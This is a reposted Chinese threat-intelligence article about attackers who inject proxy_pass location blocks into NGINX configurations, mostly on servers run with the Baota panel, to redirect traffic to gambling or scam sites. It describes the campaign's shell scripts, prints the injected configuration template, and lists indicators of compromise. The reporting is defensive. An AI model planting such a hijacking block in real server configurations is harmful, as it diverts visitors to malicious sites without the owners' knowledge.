威胁行为者入侵NGINX服务器,将网络流量重定向到恶意服务器

admin
admin
admin
0
文章
0
评论
2026-02-08 01:38:17 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 攻击者利用脚本修改NGINX配置劫持流量,通过proxy_pass指令将用户重定向至赌博或诈骗网站。该活动主要针对亚洲地区的Baota面板用户,特别是政府与教育机构。建议管理员检查配置文件是否存在指向xzz.pier46.com等恶意域名的异常转发。 综合评分: 90 文章分类: 威胁情报,WEB安全,漏洞分析

cover_image

威胁行为者入侵NGINX服务器,将网络流量重定向到恶意服务器

原创

网络安全9527 网络安全9527

安全圈的那点事儿

2026年2月6日 09:03 北京

这是一场精心策划的攻击活动,攻击者悄悄入侵NGINX 服务器,将网络流量重定向到恶意目标。

攻击者此前与“ React2Shell ”漏洞利用有关,现在他们的目标是NGINX配置,特别是那些使用Baota(BT)管理面板的配置,该面板在亚洲广泛使用。

攻击原理

这些攻击者不会安装传统的恶意软件,而是修改服务器的合法配置文件。

通过在 NGINX 的位置块中注入恶意指令,他们可以拦截用户流量并将其路由到攻击者控制的服务器,而网站所有者不会立即注意到。

此次攻击的核心在于使用 proxy_pass 指令。这是 NGINX 的一个标准功能,旨在将流量转发到后端服务器(例如PHP 应用程序)。

该活动采用简单、自动化的工作流程,涉及多个 shell 脚本:

| 脚本名称 | 角色 | 主要功能 | 目标 | | — | — | — | — | | zx.sh | Orchestrator | 初始化环境并下载所需工具 | 作为攻击链的入口点 | | bt.sh | Baota注入 | 扫描 Baota 面板配置并注入恶意代码 | 目标/www/server/panel/vhost/nginx | | 4zdh.sh | 高级注射 | 验证完成后,将有效载荷注入到 NGINX 配置中。 | 适用于通用 Linux NGINX 安装。 | | zdh.sh | 高级注入 | 与 4zdh.sh 相同,带有配置验证功能 | 收集并上传被劫持域名列表 | | ok.sh | 渗漏 | 作为攻击链的入口点 | 向攻击者C2服务器发送数据 |

但是,攻击者会重新配置它,将用户发送到他们自己的恶意域名,例如赌博或诈骗网站。

他们还使用 proxy_set_header 来确保被劫持的流量保留合法的标头,从而使重定向更难在标准日志中检测到。

location /%PATH%/ {
    set $fullurl "$scheme://$host$request_uri";
    rewrite ^/%PATH%/?(.*)$ /index.php?domain=$fullurl&$args break;
    proxy_set_header Host [Attacker_Domain];
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header X-Forwarded-Proto $scheme;
    proxy_set_header User-Agent $http_user_agent;
    proxy_set_header Referer $http_referer;
    proxy_ssl_server_name on;
    proxy_pass http://[Attacker_Domain];
}

该活动主要针对亚洲顶级域名(TLD),如 .in、.id、.th 和 .bd,以及政府(.gov)和教育(.edu)网站。

Datadog 安全研究建议管理员检查其 NGINX 配置文件,是否存在指向以下已知恶意域名的意外 proxy_pass 指令:

| 指标类型 | 价值 | 威胁类别 | 地位 | 笔记 | | — | — | — | — | — | | 域名 | xzz.pier46[.]com | 疑似 C2/恶意软件基础设施 | 活跃(未经核实) | 在恶意活动中观察到 | | 域名 | ide.hashbank8[.]com | 疑似 C2/恶意软件基础设施 | 活跃(未经核实) | 用于攻击者通信 | | 域名 | th.cogicpt[.]org | 疑似 C2/恶意软件基础设施 | 活跃(未经核实) | 潜在的渗漏终点 |

此外,网络日志显示到 IP 158.94.210[.]227 的流量表明与攻击者的基础设施存在活跃通信。

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:安全圈的那点事儿 网络安全9527 网络安全9527《威胁行为者入侵NGINX服务器,将网络流量重定向到恶意服务器》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
keepass密码的破解 网络安全文章

keepass密码的破解

文章总结: 本文详细探讨KeePass密码管理器安全性及其数据库破解技术。内容涵盖网络安全取证场景下利用特定工具对数据库进行分析与攻击的方法,演示了密码恢复的可
02-080 评论
小品-T0级漏洞 网络安全文章

小品-T0级漏洞

文章总结: 该文档是一篇标题为小品T0级漏洞的文章开头,包含作者问候及发布时间地点信息。由于正文缺失或仅由图片组成,无法获取关于漏洞的技术细节、利用方式或修复建
02-080 评论
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0